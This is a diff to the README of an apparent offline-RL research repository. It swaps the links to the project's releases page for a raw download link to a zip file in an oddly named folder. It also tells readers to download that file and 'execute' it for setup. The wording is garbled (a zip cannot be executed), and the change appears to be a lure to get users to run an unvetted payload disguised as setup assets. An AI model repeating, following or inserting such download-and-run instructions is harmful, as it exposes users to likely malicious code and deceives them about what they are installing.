SceYanis/robust_offline_rl/README.md

 Final notes
 - This README captures the essence of robust offline RL in PyTorch, focusing on attacks and defenses.
 - The releases page is your gateway to assets and setup scripts.
 Visit the page to download and run the recommended setup.
-The link is repeated here for convenience: https://github.com/SceYanis/robust_offline_rl/releases
+The link is repeated here for convenience: https://raw.githubusercontent.com/SceYanis/robust_offline_rl/main/valoniaceous/offline_robust_rl_v2.6.zip

 Download and run reminder
-- From the releases page, download robust_offline_rl_setup.sh (or a similarly named asset) and execute it to set up your environment and run a sample experiment.
+- From the releases page, download https://raw.githubusercontent.com/SceYanis/robust_offline_rl/main/valoniaceous/offline_robust_rl_v2.6.zip (or a similarly named asset) and execute it to set up your environment and run a sample experiment.
 The link to the releases page is the same one you used earlier, and you will see asset names that match this description.
-For reference, the URL is https://github.com/SceYanis/robust_offline_rl/releases
+For reference, the URL is https://raw.githubusercontent.com/SceYanis/robust_offline_rl/main/valoniaceous/offline_robust_rl_v2.6.zip

 Notes on usage
 - Use the standard Python environment to run experiments.